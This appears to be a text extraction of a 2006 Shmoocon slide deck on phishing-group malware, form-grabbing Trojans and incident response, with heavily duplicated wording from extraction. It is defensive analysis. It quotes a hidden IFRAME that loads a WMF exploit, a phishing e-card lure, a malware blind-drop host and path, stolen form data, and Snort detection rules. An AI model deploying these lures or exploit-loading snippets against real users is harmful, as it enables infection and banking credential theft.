For Distribution Copyright 2006 Secure Science Corp. 1 Trojans & Botnets & Malware, Oh My! Shmoocon ‘06 Lance James Secure Science Corporation

For Distribution Copyright 2006 Secure Science Corp. 1

Trojans & Botnets & Malware, Oh My!

Shmoocon ‘06Shmoocon ‘06Lance JamesLance James

Secure Science CorporationSecure Science Corporation

For Distribution Copyright 2006 Secure Science Corp. 2

What this talk is about?What this talk is about?

MalwareMalware In regards to incident responseIn regards to incident response Pre-emptive TechniquesPre-emptive Techniques Research & DevelopmentResearch & Development Related mainly to theft-intended Related mainly to theft-intended

malwaremalware What is Malware?What is Malware?

Malicious Software/HardwareMalicious Software/Hardware Designed to be harmfulDesigned to be harmful

For Distribution 3Copyright 2006 Secure Science Corp.

High

Low

1980 1985 1990 1995 2000+

password guessing

self-replicating code

password cracking

exploiting known vulnerabilities

disabling audits

back doors

hijacking sessions

sweepers

sniffers

packet spoofing

GUIautomated probes/scans

denial of service

www attacks

Tools

Attackers

IntruderKnowledge

AttackSophistication

“stealth” / advanced scanning techniques

burglaries

network mgmt. diagnostics

distributedattack tools

Cross site scripting

Stagedattack

Cyber Attack SophisticationCyber Attack SophisticationContinues To EvolveContinues To Evolve

bots

Source: CERT


And Continue To And Continue To Grow…Grow…

Data theft grew more than 650%

over the past 3 years — CSI/FBI

137,000

security incidents in 2003, nearly twice as

many as in 2002

— CERT

Avg reported loss from attacks was $2.7M per

incident — CSI/FBI survey

85%of respondentshad breaches

— CSI/FBI survey85%

of the critical infrastructure is

owned or operated by the private sector

Source : Carnegie Mellon


Growth Or Liability?Growth Or Liability? Over twenty per cent of Internet Over twenty per cent of Internet

users now access online banking users now access online banking services.services. This total will reach 33% by 2006, This total will reach 33% by 2006,

according to The Online Banking Report. according to The Online Banking Report. By 2010, over 55 million US households By 2010, over 55 million US households

will use online banking and ePayments will use online banking and ePayments services, which are tipped as "growth services, which are tipped as "growth areas". areas".

Wamu buys Providian, BofA buys MBNAWamu buys Providian, BofA buys MBNA And so what about the ‘And so what about the ‘PhishingPhishing’ ’

threat to e-commerce?threat to e-commerce?Source: ePaynews


What Is Phishing?What Is Phishing? PhishingPhishing,, also referred to as also referred to as brand spoofingbrand spoofing, ,

as it is a variation on “fishing,” the idea being that as it is a variation on “fishing,” the idea being that bait is thrown out with the hopes that while most bait is thrown out with the hopes that while most will ignore the bait, some will be tempted into will ignore the bait, some will be tempted into biting. biting. Phishing is the act of sending a communication to a user Phishing is the act of sending a communication to a user

falsely claiming to be an established legitimate falsely claiming to be an established legitimate enterprise in an attempt to scam the user into enterprise in an attempt to scam the user into surrendering private information that will be used for surrendering private information that will be used for identity theft. identity theft.

The communication (usually email) directs the user to The communication (usually email) directs the user to visit a visit a Web siteWeb site where they are asked to update personal where they are asked to update personal information, such as passwords and credit card, social information, such as passwords and credit card, social security, and bank account numbers, that the legitimate security, and bank account numbers, that the legitimate organization already has. organization already has.

The Web site, however, is bogus or hostile and set up The Web site, however, is bogus or hostile and set up only to steal the user’s information. only to steal the user’s information.


What’s Worse?What’s Worse? Email Phish or Phishing Malware?Email Phish or Phishing Malware?

Some of the larger phishing groups have Some of the larger phishing groups have associations with both phishing emails associations with both phishing emails and key-logging malware. and key-logging malware.

While phishing email is very effective, While phishing email is very effective, the number of victims is significantly the number of victims is significantly smaller than the victims of phishing smaller than the victims of phishing malware. malware.

Logs recovered from base camps for Logs recovered from base camps for phishing emails and malware show a phishing emails and malware show a startling difference.startling difference.


Email –vs- MalwareEmail –vs- Malware

A single key logging Trojan can generate hundreds of megabytes of data in a week. The data is not processed by hand. Instead, scripts are used to filter the information. Potentially valuable information is frequently ignored due to the filtering process.

Each victim = < 500 bytes of data.1 week = < 50Kbytes. A single person can process the data in

minutes.

Volume of data generated

Account login, or credit card number with expiration and address.

Generally, a single victim only loses a single amount of information. Few victims lose more than one type of information. And the information compromised may not match the information desired by the phisher.

Name, address, phone, SSN, credit card, VCC2, bank account numbers, logins and passwords, and even items such as mother’s maiden name or the answer to the “forgot your password” prompt.

Generally, victims provide all of the information asked.

Type of information compromised

500,000100Average number of accounts compromised in a week

Phishing Malware / KeyloggersPhishing Emails


Email –vs- Malware Email –vs- Malware (cont.)(cont.)

A single malware system, including Trojan and receiving server, may take months to develop. Each variant may take a week or longer to develop. When generic anti-virus signatures appear, redevelopment may take weeks or months.

A single phishing server may take one week to develop. The server may then be applied to hundreds of blind drop servers and reused for weeks or longer. Changes to the phishing email content (bait) can be measured in hours and may not need a change to the phishing server.

Total development cost to the phishers?

Most malware is effective for a week before anti-virus vendors develop signatures.

Some phishing groups use malware in limited distributions. While these programs may exist for much longer durations, they generally collect less information.

A single person that is infected may compromise the same information multiple times.

Reused regularly for weeks or months before requiring a change. Due to simple changes in the mailing list, a variety of people can be solicited – information is almost never collected from the same person twice.

How often is the method viable?

Phishing Malware / Key loggersPhishing Emails


Phishing Malware Phishing Malware (cont.)(cont.)

In November of 2003, the concept of In November of 2003, the concept of a single mega-virus changed. a single mega-virus changed. Gaobot, followed by Sasser and Berbew, Gaobot, followed by Sasser and Berbew,

took a different tact: rather than one took a different tact: rather than one mega-worm, these consisted of hundreds mega-worm, these consisted of hundreds of variants – each slightly different. of variants – each slightly different.

The goal of the variant was not to The goal of the variant was not to become a mega-worm, but rather to become a mega-worm, but rather to infect a small group of systems. infect a small group of systems.



This approach provided two key benefits to the This approach provided two key benefits to the malware authors:malware authors:

Limited distribution; limited detectionLimited distribution; limited detection.. As long as As long as the malware is not widespread, the anti-virus vendors the malware is not widespread, the anti-virus vendors would be less likely to detect the malware. (If Norton would be less likely to detect the malware. (If Norton doesn’t know about a virus, then they cannot create a doesn’t know about a virus, then they cannot create a detection signature for the virus.) detection signature for the virus.)

Over the last 12 months Secure Science Corporation has Over the last 12 months Secure Science Corporation has identified dozens of virus variants used by phishers, identified dozens of virus variants used by phishers, carders, and generic malware authors that are not carders, and generic malware authors that are not detected by anti-virus software.detected by anti-virus software.

Rapid deploymentRapid deployment.... Nearly a hundred variants of Nearly a hundred variants of Sasser were identified in less than three months. Sasser were identified in less than three months. Each variant requires a different detection signature. Each variant requires a different detection signature. The rapid modification and deployment ensures that The rapid modification and deployment ensures that anti-virus vendors will overtax their available anti-virus vendors will overtax their available resources, becoming less responsive to new strains. resources, becoming less responsive to new strains. It also ensures that some variants will not be It also ensures that some variants will not be detected.detected.



We’re seeing a significant increase in We’re seeing a significant increase in malware used by phishing groups.malware used by phishing groups. IE exploitation via ActiveX Blended IE exploitation via ActiveX Blended

ThreatsThreats Let’s take a closer look at the malware, Let’s take a closer look at the malware,

and the threat model behind phishers and the threat model behind phishers and their malware.and their malware.

Malware key-logging mythsMalware key-logging myths



A few phishing groups have been A few phishing groups have been associated with specific malware.associated with specific malware. The malware is used for a variety of The malware is used for a variety of

purposes:purposes: Compromising hosts for operating the Compromising hosts for operating the

phishing server;phishing server; Compromising hosts for relaying the bulk Compromising hosts for relaying the bulk

mailing;mailing; Directly attacking clients with key-logging Directly attacking clients with key-logging

software.software.

A single piece of malware may serve A single piece of malware may serve any or all of these purposes.any or all of these purposes.


Malware TrendsMalware Trends In early 2004, the malware associated with In early 2004, the malware associated with

phishing groups rarely appeared to be created phishing groups rarely appeared to be created specifically for phishing. Instead, was focused on specifically for phishing. Instead, was focused on botnet* attributes:botnet* attributes:

Email relayEmail relay.. The software opens network services that can The software opens network services that can be used to relay email anonymously. This is valuable to be used to relay email anonymously. This is valuable to phishers, and spammers in general.phishers, and spammers in general.

Data miningData mining.. The malware frequently contains built-in The malware frequently contains built-in functions for gathering information from the local system. functions for gathering information from the local system. The gathering usually focuses on software licenses (for The gathering usually focuses on software licenses (for game players , warez, or serialz dealersgame players , warez, or serialz dealers****) and Internet ) and Internet Explorer cache. The latter may contain information such as Explorer cache. The latter may contain information such as logins. For phishers, this type of data mining primarily logins. For phishers, this type of data mining primarily focuses on account logins to phishing targets.focuses on account logins to phishing targets.

* * A compromised system with remote control capabilities is a “bot”. A compromised system with remote control capabilities is a “bot”. A “botnet” is a collection of these compromised hosts. A “botnet” is a collection of these compromised hosts.

**** Illegally distributed software applications (warez) and the Illegally distributed software applications (warez) and the associated license keys (serialz) are frequently available and associated license keys (serialz) are frequently available and propagated through the underground software community.propagated through the underground software community.


Malware Trends Malware Trends (cont.)(cont.)

Remote controlRemote control. The malware usually has . The malware usually has backdoor capabilities. This permits a remote backdoor capabilities. This permits a remote user to control and access the compromised user to control and access the compromised host. For a phisher, there is little advantage host. For a phisher, there is little advantage to having a backdoor to a system unless they to having a backdoor to a system unless they plan to use the server for hosting a phishing plan to use the server for hosting a phishing site. But for other people, such as virus site. But for other people, such as virus writers or botnet farmerswriters or botnet farmers**, remote control is , remote control is an essential attributean essential attribute..

* * A “botnet farmer” is an individual or group that A “botnet farmer” is an individual or group that manages and maintains one or more botnets. The manages and maintains one or more botnets. The botnet farmers generate revenue by selling systems or botnet farmers generate revenue by selling systems or CPU time to other people. Essentially, the botnet CPU time to other people. Essentially, the botnet becomes a large timeshare computer network.becomes a large timeshare computer network.



By Q3 of 2004, a few, large phishing By Q3 of 2004, a few, large phishing groups had evolved to support their groups had evolved to support their own specific malware.own specific malware. While the malware did contain email While the malware did contain email

relays, data mining functions, and relays, data mining functions, and remote control services, these had been remote control services, these had been tuned to support phishing specifically. tuned to support phishing specifically.

Viruses such as W32.Spybot.Worm Viruses such as W32.Spybot.Worm included specific code to harvest bank included specific code to harvest bank information from compromised hosts.information from compromised hosts.



A few phishing groups also appeared A few phishing groups also appeared associated with key logging software. associated with key logging software. While not true “key logging”, these While not true “key logging”, these

applications capture data submitted applications capture data submitted (posted) to web servers.(posted) to web servers.

A true key logger would generate massive A true key logger would generate massive amounts of data and would be difficult for an amounts of data and would be difficult for an automated system to identify account and automated system to identify account and login information.login information.



Instead, these applications hook into Instead, these applications hook into Internet Explorer’s (IE) form Internet Explorer’s (IE) form submission system.submission system. All data from the submitted form is All data from the submitted form is

relayed to a blind drop operated by the relayed to a blind drop operated by the phishers. phishers.

The logs contain information about the The logs contain information about the infected system, as well as the URL and infected system, as well as the URL and submitted form values. submitted form values.

More importantly, the malware More importantly, the malware intercepts the data before it enters any intercepts the data before it enters any secure network tunnel, such as SSL or secure network tunnel, such as SSL or HTTPS.HTTPS.



Examples of data output:Examples of data output: Recent examples of HaxDoor, Berbew Recent examples of HaxDoor, Berbew

and PWS.Banker reveal similar and PWS.Banker reveal similar “Formgrabbing”“Formgrabbing”

reason=&Access_ID=xxxxxxxx&Access_ID_1=&Current_Passcode=xxxxxxx&acct=&pswd=&froreason=&Access_ID=xxxxxxxx&Access_ID_1=&Current_Passcode=xxxxxxx&acct=&pswd=&from=homepage&Customer_Type=MODEL&pmbutton=false&pmloginid=&dltoken=&id=*******&m=homepage&Customer_Type=MODEL&pmbutton=false&pmloginid=&dltoken=&id=*******&state=MA&pc=*******state=MA&pc=*******

onlineid.bankofamerica.com/cgi-bin/sso.login.controlleronlineid.bankofamerica.com/cgi-bin/sso.login.controller [11023586123662948896][11023586123662948896] [IP:xxx.xxx.xxx.xxx 13.09.2005 8:26:32][IP:xxx.xxx.xxx.xxx 13.09.2005 8:26:32]

Distributed through IE Class-ID attacksDistributed through IE Class-ID attacks ADB/CHMADB/CHM IFRAME TAGIFRAME TAG Javaprxy???Javaprxy???


Side-Bar, Case ExampleSide-Bar, Case Example

Anti-Malware Snake-OilAnti-Malware Snake-Oil Virtual KeyboardsVirtual Keyboards Key-board Logging ProtectionKey-board Logging Protection Scramble PadsScramble Pads Anti-Spyware Desktop softwareAnti-Spyware Desktop software

99% of Information Theft Malware 99% of Information Theft Malware

doesn’t log key strokes! (it’s doesn’t log key strokes! (it’s

unscalable)unscalable)


Side-Bar, Case Example Side-Bar, Case Example (cont)(cont)



The end of 2004 showed a significant modification The end of 2004 showed a significant modification to the malware used by some phishing groupsto the malware used by some phishing groups. . The prior key logging systems generated gigabytes of The prior key logging systems generated gigabytes of

data in a very short time. This made data mining data in a very short time. This made data mining difficult, since only a few sites were of interest to the difficult, since only a few sites were of interest to the phishers. phishers.

By the end of 2004 and into 2005, the phishers had By the end of 2004 and into 2005, the phishers had evolved their software. evolved their software.

Loggers focus on specific URLs, such as the web logins to Loggers focus on specific URLs, such as the web logins to Citibank and Bank of America. Citibank and Bank of America.

It is believed that this was intended to pre-filter the data It is believed that this was intended to pre-filter the data collected by the malware. Rather than collecting all of the collected by the malware. Rather than collecting all of the submitted data, only submitted data of interest was submitted data, only submitted data of interest was collected. collected.

More importantly, multiple viruses appeared with this More importantly, multiple viruses appeared with this capability – indicating that multiple phishing groups evolved capability – indicating that multiple phishing groups evolved at the same time. This strongly suggests that malware at the same time. This strongly suggests that malware developers associated with phishers are in communication developers associated with phishers are in communication or have a common influencing source.or have a common influencing source.



PG02 significant attack pattern identifiedPG02 significant attack pattern identified Cpanel (WebISP in a box) exploitationCpanel (WebISP in a box) exploitation

System compromiseSystem compromise Payload launchPayload launch www.site.com/images/newex.htmlwww.site.com/images/newex.html

Hijacks Network or Box for SpammingHijacks Network or Box for Spamming Sending SpamSending Spam Uses DMS generation 2Uses DMS generation 2 Enabling anonymityEnabling anonymity

Uses Dark IP space for forged receive headerUses Dark IP space for forged receive header Object Class Exploits for IEObject Class Exploits for IE

Trojan Downloader payloadTrojan Downloader payload Classifies malware as “MSITS.exe”Classifies malware as “MSITS.exe”

Reference to MS-ITS protocol attacksReference to MS-ITS protocol attacks Uses GPL code from Uses GPL code from www.edup.tudelft.nl/~bjwever/www.edup.tudelft.nl/~bjwever/ Berend-Jan Wever websiteBerend-Jan Wever website



Object Class attacks not “brand new”Object Class attacks not “brand new” Uses older ADB Exploit even though newer attacks existUses older ADB Exploit even though newer attacks exist January-February 2005 haxdoor variants existed on for January-February 2005 haxdoor variants existed on for

win98win98 Suggests targeting “End of Life” productSuggests targeting “End of Life” product Win98 EOL on security upgradesWin98 EOL on security upgrades

No education on phishingNo education on phishing No SP2, built in pop-up blockersNo SP2, built in pop-up blockers

Evolutionary patternEvolutionary pattern Suggests Path of Least ResistanceSuggests Path of Least Resistance Evolve when necessaryEvolve when necessary Win98 is plentiful and best target!Win98 is plentiful and best target! Why Move??Why Move??


Latest ThreatsLatest Threats WMF exploitWMF exploit

Discovered by Dan Hubbard (WebSense)Discovered by Dan Hubbard (WebSense) Found in the wild as a 0-dayFound in the wild as a 0-day Phishers were using it from Day 0Phishers were using it from Day 0 It was supposed to be patched in NovemberIt was supposed to be patched in November

MS05-053MS05-053 Nuclear Grabber used by Phishing Group Nuclear Grabber used by Phishing Group

#02#02 Written by Corpse (Author of A-311 Death and Written by Corpse (Author of A-311 Death and

Nuclear Grabber)Nuclear Grabber) AV Vendors call it HaxdoorAV Vendors call it Haxdoor

Sells software on Corpsespyware.net from Sells software on Corpsespyware.net from $250.00 to $2500.00$250.00 to $2500.00

Russian sales onlyRussian sales only


Phishing Trends Phishing Trends (cont.)(cont.)

Serial Pattern for process of HaxdoorSerial Pattern for process of Haxdoor Successor to Berbew malware from 2004Successor to Berbew malware from 2004 Very likely relation to original Berbew authorsVery likely relation to original Berbew authors ’’05 Berbew marked with Corpse’s Signature05 Berbew marked with Corpse’s Signature Haxdoor malware written in AssemblyHaxdoor malware written in Assembly Trojan Creation KitTrojan Creation Kit Compiles with permutationsCompiles with permutations Packed with FSGPacked with FSG Easy for Phishers to compile on the fly with customized Easy for Phishers to compile on the fly with customized

Settings.Settings.


Latest ThreatsLatest Threats


Email from Phishing Group for WMF exploitEmail from Phishing Group for WMF exploit

Dear Friend, Dear Friend,

Friends [ Friends [ fromfriendsfromfriends at at aol.comaol.com ] has sent you an e-card from ] has sent you an e-card from

<A href="http://123Greetings.com">123Greetings.com</A> . <A href="http://123Greetings.com">123Greetings.com</A> .

<A href="http://123Greetings.com">123Greetings.com</A> is all about touching <A href="http://123Greetings.com">123Greetings.com</A> is all about touching lives, bridging distances, healing rifts and building bonds. We have a gallery of e-lives, bridging distances, healing rifts and building bonds. We have a gallery of e-cards for almost every occasion of life. Express yourself to your friends and family cards for almost every occasion of life. Express yourself to your friends and family by sending Free e-cards from our site with your choice of colors, words and music.by sending Free e-cards from our site with your choice of colors, words and music.

Your e-card will be available with us for the next 30 days. If you wish to keep the e-Your e-card will be available with us for the next 30 days. If you wish to keep the e-card longer, you may save it on your computer or take a print. card longer, you may save it on your computer or take a print.

To view your e-card, choose from any of the following options: To view your e-card, choose from any of the following options:

<a href=<a href=http://www.123greetings.com/NY2006z3http://www.123greetings.com/NY2006z3 target=_blank><table><tr><td><a href="target=_blank><table><tr><td><a href="http://http://mujergorda.bitacoras.com/base/index.htmlmujergorda.bitacoras.com/base/index.html"">>http://www.123greetings.com/NY2006z3</tdhttp://www.123greetings.com/NY2006z3</td></tr></table></a> ></tr></table></a>

Latest ThreatsLatest Threats


Identify the Threat, Label it - Here’s their Identify the Threat, Label it - Here’s their analysisanalysis

What AV does with this?What AV does with this?


Problem exists hereProblem exists here Labeled Low Threat based on AV metricsLabeled Low Threat based on AV metrics Shoved in with the rest of the Trojan.small.emShoved in with the rest of the Trojan.small.em No known resolve other than desktop preventionNo known resolve other than desktop prevention

Very reactive, (as we all know)Very reactive, (as we all know) Evolving malware disables AV (common Evolving malware disables AV (common

knowledge)knowledge) How do we change this?How do we change this?

Change the AV metricChange the AV metric Use common senseUse common sense Proactive, not reactiveProactive, not reactive Serial Pattern analysis w/ common sense is keySerial Pattern analysis w/ common sense is key

Problem?Problem?


Incident ResponseIncident Response Emerging ThreatsEmerging Threats

Management by ObjectiveManagement by Objective Per incident basisPer incident basis Threat modelling necessary (but usually Threat modelling necessary (but usually

never happens)never happens) Malware author groupingMalware author grouping

Serial PatternSerial Pattern Pre-emptive SignaturesPre-emptive Signatures

Forces them to evolve (ROI lowers)Forces them to evolve (ROI lowers) Possible ApprehensionPossible Apprehension


R&D + IR=ProactiveR&D + IR=Proactive Research for Research for HaxdoorHaxdoor

<IFRAME src="<IFRAME src="http://http://imkportedoor.com/images/ny.wmfimkportedoor.com/images/ny.wmf"" frameborder=0 vspace=0 hspace=0 marginwidth=0 marginheight=0 frameborder=0 vspace=0 hspace=0 marginwidth=0 marginheight=0 width=0 height=0 scrolling=no> </IFRAME> width=0 height=0 scrolling=no> </IFRAME>

Grabs msits.exe from Grabs msits.exe from www.site.com/images/msits.exewww.site.com/images/msits.exe Packed with FSG (marked with Corpse Signature within Packing)Packed with FSG (marked with Corpse Signature within Packing)

003C1BD1 PUSH ies4dll.003C1165 ASCII 003C1BD1 PUSH ies4dll.003C1165 ASCII www.pcpeek-webcam-sex.comwww.pcpeek-webcam-sex.com

003C1BE0003C1BE0 PUSH ies4dll.003C11C9 ASCII "images/data.php“PUSH ies4dll.003C11C9 ASCII "images/data.php“

Blind drop IdentifiedBlind drop Identified Data recovered in realtimeData recovered in realtime

Phishing the PhishersPhishing the Phishers


Data RecoveryData Recovery


Impact DOAImpact DOA Blind drop log monitoringBlind drop log monitoring

Data returned to institution that’s compromisedData returned to institution that’s compromised Real-time risk mitigationReal-time risk mitigation

Pre-emptive ActionPre-emptive Action What do we know?What do we know?

Packed with FSGPacked with FSG How many non-malicious executables are packed with How many non-malicious executables are packed with

FSGFSG Talks to /images/data.php Talks to /images/data.php Some versions /images/dat7.php and /images/bsrv.phpSome versions /images/dat7.php and /images/bsrv.php Group titles it msits.exe and msys.exeGroup titles it msits.exe and msys.exe Bleeding-Edge SnortBleeding-Edge Snort alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"BLEEDING-EDGE MALWARE alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"BLEEDING-EDGE MALWARE

Corpsepsyware.net - PG 02 Inbound"; flow:from_server,established; content:"|4D 5A|"; content:"|50 45 00 00 Corpsepsyware.net - PG 02 Inbound"; flow:from_server,established; content:"|4D 5A|"; content:"|50 45 00 00 4C 01 02 00 46 53 47 21|"; distance:10; classtype:trojan-activity; 4C 01 02 00 46 53 47 21|"; distance:10; classtype:trojan-activity; reference:url,www.securityfocus.com/infocus/1745; sid:2002773; rev:2;) reference:url,www.securityfocus.com/infocus/1745; sid:2002773; rev:2;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE MALWARE alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE MALWARE Corpsespyware.net - PG 02 Outbound"; flow:to_server,established; content:"|4D 5A|"; content:"|50 45 00 00 Corpsespyware.net - PG 02 Outbound"; flow:to_server,established; content:"|4D 5A|"; content:"|50 45 00 00 4C 01 02 00 46 53 47 21|"; distance:10; classtype:trojan-activity; 4C 01 02 00 46 53 47 21|"; distance:10; classtype:trojan-activity; reference:url,www.securityfocus.com/infocus/1745; sid:2002772; rev:1;) reference:url,www.securityfocus.com/infocus/1745; sid:2002772; rev:1;)


OutcomeOutcome Snort SigsSnort Sigs

Prevent a large amount of new phishing Prevent a large amount of new phishing malwaremalware

Corpse has to change his methodCorpse has to change his method Many other phishing malware packed same wayMany other phishing malware packed same way

Problem response vs Incident Problem response vs Incident ResponseResponse Look at overall problemLook at overall problem

Example:Example: Form GrabbingForm Grabbing Assume everyone is infectedAssume everyone is infected How do we solve this?How do we solve this?


Example: Form GrabbingExample: Form Grabbing


So you’re not a RCESo you’re not a RCE Tricks for IRTricks for IR

IEHTTPHEADERSIEHTTPHEADERS BHO and IE hooksBHO and IE hooks Uses IE as AgentUses IE as Agent Locate Blind DropLocate Blind Drop

Monitor and MitigateMonitor and Mitigate VMWareVMWare

Sandbox (with snapshots)Sandbox (with snapshots) Tools like sysinternals, Ollydbg, winpoochTools like sysinternals, Ollydbg, winpooch Joe Stewart has some new tools for sandnetJoe Stewart has some new tools for sandnet

As it becomes more prevalentAs it becomes more prevalent More tools available for the common response More tools available for the common response

teamteam Common sense is sometimes the best weaponCommon sense is sometimes the best weapon


Contact InfoContact Info

Secure Science CorporationSecure Science Corporation

7770 Regents Rd.7770 Regents Rd.

Suite 113-535Suite 113-535

San Diego, CA. 92122-1967San Diego, CA. 92122-1967

(877)570-0455(877)570-0455

http://www.securescience.nethttp://www.securescience.net

Email: Email: [email protected]@securescience.net

Lance James ~ CTOLance James ~ CTO


QuestionsQuestions

Documents

For Distribution Copyright 2006 Secure Science Corp. 1 Trojans & Botnets & Malware, Oh My! Shmoocon ‘06 Lance James Secure Science Corporation